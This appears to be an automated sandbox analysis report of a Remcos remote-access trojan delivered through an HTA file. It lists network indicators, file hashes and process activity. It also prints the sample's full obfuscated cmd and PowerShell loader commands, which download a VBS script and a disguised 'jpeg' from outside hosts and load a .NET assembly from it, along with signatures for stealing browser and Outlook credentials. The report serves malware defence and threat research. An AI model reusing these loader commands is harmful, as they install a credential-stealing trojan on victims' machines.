≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"

Network

Country Destination Domain Proto
US 107.173.192.135:80 107.173.192.135 tcp
US 8.8.8.8:53 servidorwindows.ddns.com.br udp
BR 191.55.76.236:80 servidorwindows.ddns.com.br tcp

Files

\??\c:\Users\Admin\AppData\Local\Temp\e410m-ly.cmdline

MD5 38199bcd7f6c80e2a09e4198e6447f2d
SHA1 aa98cc6d12095f730e922ed9e6fbf0a6b3166abc
SHA256 185d1ddb883f05193e43e40b899d46f23eb5903265d82ae45dd189c21731aa42
SHA512 9790b7a1a545e360bfc9b92db523e774bcf2bc5d39e0b6506244fe94584bdcdf181a5c9a6cbe24c1f30afb95ede61ac34999ce0e565fc952475517560a5b44fa

\??\c:\Users\Admin\AppData\Local\Temp\e410m-ly.0.cs

MD5 d71dc34ff8dbecd13f179ed952a841d5
SHA1 78c3b0d410495a39154fbd26663468d6e5de5768
SHA256 19b4037d5d9fa1532eb40ab0f16ad5a5c96cb3d9d3ab27b3e4e82ea74f3cf175
SHA512 2b6397a38038caa9b412460801b007615461db4f8e24a8896f17cad90bc5d50286682387cc524aee6c3a38172d9932a125aef07c5ebdcc406ef7203a577aa84f

\??\c:\Users\Admin\AppData\Local\Temp\CSC8D23.tmp

MD5 3c73d2605638c2a3f1a02341a397c7c4
SHA1 6dfaa0ef708a70098aa05c4381f89f8f447a0067
SHA256 5f69f30731ad28f51c2fca48991f19a79105f810a3450b21ce0add96abf3e624
SHA512 b0f04304d7363ded4985822f6fc14790777a31c8a3f46b18e17d05f238c0adc52b35598fc4740dddfb6577016f22b6dc7bcd12ddba449d8a69b7d71515f9e689

C:\Users\Admin\AppData\Local\Temp\RES8D24.tmp

MD5 b2bec49cb083f053093ffc4727e352cc
SHA1 3c28cbc8ec291c3b957a46e6b55e7db7074c3979
SHA256 84ea5ad77d4e025b6ab2565d2b78a95aa3bcada4b9a505e5477d165482194665
SHA512 f46c355083dcdccfd45db49a2c8d80326528629fb6c12cf5e8118be5855769ed0f420b77baba15bffe2c947fdac136f20fad100401b7219cf5bb434ec300e4b8

C:\Users\Admin\AppData\Local\Temp\e410m-ly.dll

MD5 b5cb5a94ef5c0f34e44be338a4950b5e
SHA1 8eb5a01a796b2c0365e4e637310aabee3d5e9a0f
SHA256 4c6b0fb7081e025e356bc7db7e0b9f563a6526afb9780bb8101afe34977aca7b
SHA512 988163de59a7fc01560742424046ffb1f03bc389eb29467878c07fbfbceac5832396acb003b6d5e0338f78f697732d727dd0075d70c38d7e36778706f646a0b5

C:\Users\Admin\AppData\Local\Temp\e410m-ly.pdb

MD5 07e94ca06fef76a9e98089b68dd06565
SHA1 e0175c04fc676627aa5cf68053d9b67d488bf8f2
SHA256 72ff48b5bef2b1e3a3d47f6983bafbd4ec36518aeedfccb8fc05aa05f84265b3
SHA512 0161e52e94d64012c6b4d4c56084d0c4338b52f35801ca67e16d16d649bc073bef9c4984190064abe47c48c209c2b9812852e681154b000e2ec141293d56a122

C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS

MD5 7788462fff77921361629f1053e761ec
SHA1 9414413ddaa18d38c3f7cd7119e1958e8afcb5df
SHA256 fc4746b756fb20e572af314479447accf175c9eddfac1ea9b73326c2f410a753
SHA512 e4a138ad53a31d60c6db73da16ceb4f15d9d40639b72e1c5e872492b7a25aa32ad7ed8aacb64bc9379a735c49786a35edf200e652876f70e3009aba6326abbc5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d48106066fe8aa44287a17e8fe159e23
SHA1 fae86d078b95c43050493b0ecce36a5103bec9e1
SHA256 9998335b24b6d7cc3dec8d8b5490dcd1d3fecd2d323c23b1c5becb6f346370af
SHA512 e06eaf0287cd6fae290e0c9cc02e2d5ae8bc1312eb2766e9232482f1b2f1edaea28d7d355229822a2c2748f51cdf743c71c1c19e7732c974369e1e99d5ece364

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-07 07:17

Reported

2024-08-07 07:20

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

150s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Remcos

rat remcos

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1660 wrote to memory of 2596 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2596 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2596 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2596 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1268 wrote to memory of 4580 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1268 wrote to memory of 4580 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1268 wrote to memory of 4580 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4580 wrote to memory of 4592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4580 wrote to memory of 4592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4580 wrote to memory of 4592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1268 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 1268 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 1268 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 3856 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 3472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 3472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 3472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3472 wrote to memory of 1928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 4312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 4312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 4312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 4312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 2780 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 2780 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 2780 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 2780 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 3612 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 3612 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 3612 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1928 wrote to memory of 3612 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp" "c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\CSC8A85977435C44FDE89D0A35EC9FA1467.TMP"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴LwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cgB2≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴dwBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bu≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴LgBj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴cg≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴YgBz≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴agBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴ZQBi≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bgB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB3≩ ⫻ ㏤ ≪ ㏴C0≩ ⫻ ㏤ ≪ ㏴TwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴VwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgB5≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴ew≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ 